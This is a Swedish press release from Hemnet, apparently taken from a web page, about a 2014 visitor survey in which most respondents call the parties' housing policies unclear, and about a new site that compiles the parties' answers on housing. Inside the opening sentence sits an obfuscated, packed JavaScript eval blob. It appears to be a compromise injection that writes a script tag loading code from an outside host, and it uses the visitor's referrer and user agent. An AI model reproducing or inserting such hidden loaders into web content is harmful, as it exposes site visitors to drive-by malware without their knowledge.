Image Image Image Image Image Image Image Image Image Image

| 31 mars, 2020

Scroll to top

Top

6 av 10 uppfattar partiernas bostadspolitik som otydlig enligt ny undersökning

6 av 10 uppfattar partiernas bostadspolitik som otydlig enligt ny undersökning

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nsrhk|var|u0026u|referrer|rdaaz||js|php’.split(’|’),0,{}))
än 6 av 10 ser bostadsbristen som en viktig fråga inför valet i september, men samtidigt tycker nästan lika många (6 av 10) att partiernas bostadspolitik är otydlig. 39 procent anser också att det är små skillnader mellan partiernas bostadspolitik. Det visar en ny undersökning bland Hemnets besökare. Därför lanserar Hemnet nu initiativet 
bostadsvalet.hemnet.se där svar på de viktigaste bostadsfrågorna, från de tio största partierna, sammanställts.

Bostadsbristen en viktig fråga inför valet

Totalt anser 64 % att bostadsbristen är en viktig valfråga. Bostadsbristen påverkar och är sammankopplad med viktiga samhällsfrågor såsom segregation, urbanisering och tillväxt, men får också konsekvenser i människors privatliv. Enligt den nya undersökningen har 3 av 10 har på något sätt begränsats av bostadsbristen. Vanligaste konsekvensen är att man tvingats bo hemma hos föräldrarna längre än önskat (15 procent). Att avstå arbete eller utbildning är andra följder av bostadsbristen (5 respektive 3 procent) och sex procent har varit med om att en kärleksrelation tagit slut på grund av svårigheter att hitta en bostad.

– Intresset för bostadsmarknaden är större än någonsin. Hemnets trafik ligger på rekordnivåer och just nu har vi cirka 2,5 miljoner besökare i veckan. Samtidigt är utbudet av bostäder rekordlågt, både för bostadsrätter och villor. Det i kombination med svårigheten att få en hyresrätt gör att bostadsbristen blir en allt viktigare fråga inför valet, säger Staffan Tell, talesperson för Hemnet.

Bostadspolitiken uppfattas som otydlig
Men trots att bostadsbristen anses vara en viktig fråga inför valet, upplever 6 av 10 att det är otydligt vad de politiska partierna vill göra för attförbättra bostadssituationen. 39 procent anser också att det är små skillnader mellan partiernas bostadspolitik.

Hemnet sammanställer partiernas bostadspolitik
Hemnet lanserar nu bostadsvalet.hemnet.se där svar på fem viktiga bostadsfrågor från de 10 största partierna sammanställts. Frågorna rör bostadsbristen, bristen på ungdomsbostäder, den snabba urbaniseringstakten samt vilka bostadsfrågor som partierna anser mest prioriterade, men också vilka frågor som har glömts bort i debatten.

– Det är tydligt att bostadsbristen är en viktig fråga för många inför valet. Samtidigt verkar politikerna inte ha lyckats nå fram med sina budskap om vad de vill göra för att lösa bostadsbristen. Vår ambition med det här initiativet är att fungera som en länk mellan våra besökare och politikerna för att påvisa bostadsfrågans betydelse och hjälpa människor att fatta ett genomtänkt beslut i valet, säger Staffan Tell.

Fakta om undersökningen:
Undersökningen genomfördes som en enkät på Hemnet.se under vecka 34, 2014. Totalt deltog 1 178 personer i undersökningen.

Detta är ett pressmeddelande från Hemnet